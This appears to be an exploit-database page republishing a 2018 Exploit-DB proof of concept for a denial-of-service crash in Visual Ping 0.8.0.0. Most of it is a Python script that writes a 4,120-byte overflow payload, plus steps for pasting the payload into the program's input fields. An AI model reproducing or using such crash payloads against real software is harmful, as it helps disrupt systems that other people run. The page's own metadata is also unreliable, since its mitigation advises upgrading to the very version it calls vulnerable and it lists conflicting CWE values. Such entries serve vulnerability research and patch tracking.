Visual Ping 0.8.0.0 - 'Host' Denial of Service (PoC)

vendor:

Visual Ping

by:

Uriel Corral Salinas

7.8

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Visual Ping

Affected Version From: 0.8.0.0

Affected Version To: 0.8.0.0

Patch Exists: YES

Related CWE: N/A

CPE: a:itlights:visual_ping:0.8.0.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 Pro x64

2018

Visual Ping 0.8.0.0 – ‘Host’ Denial of Service (PoC)

Visual Ping 0.8.0.0 is vulnerable to a denial of service attack when the user inputs a specially crafted string into the 'Host, Time Out,packet size, Pause, Loops' fields. An attacker can exploit this vulnerability by executing the Visual_Ping.py code, copying the contents of VisualPing.txt to the clipboard, executing VPing.exe, and then copying the clipboard contents into the 'Host, Time Out,packet size, Pause, Loops' fields. When the 'Start' button is clicked, the application will crash.

Mitigation:

Upgrade to the latest version of Visual Ping 0.8.0.0.

Source

Exploit-DB raw data:

# Exploit Title: Visual Ping 0.8.0.0 - 'Host' Denial of Service (PoC)
# Date: 2018-08-30
# Exploit Author: Uriel Corral Salinas
# Vendor Homepage: http://www.itlights.com
# Software Link: http://www.scanwith.com/download/Free_Visual_Ping.htm
# Version: Free Visual Ping  (Version 0.8.0.0)
# Tested on: Windows 10 Pro x64

# Visual Ping 0.8.0.0 - 'Host, Time Out,packet size, Pause, Loops' - Denial of Service (PoC)
# 1. Ejecutar codigo "Visual_Ping.py"
# 2. Copiar contenido de "VisualPing.txt" al portapapeles
# 3. Ejecutar VPing.exe
# 4. Copiar portapapeles en Host
# 5. Copiar portapapeles en Time Out
# 6. Copiar portapapeles en Packet size
# 7. Copiar portapapeles en Pause
# 8. Copiar portapapeles en Loops
# 9. Click en Star
# 10. Crashed

#!/usr/bin/env python

f=open("VisualPing.txt","w")
buff = "\x41" * 4108
ggg = "\x42" * 4
hhh = "\x43" * 4
iii = "\x44" * 4
f.write(buff + ggg + hhh + iii)
f.close()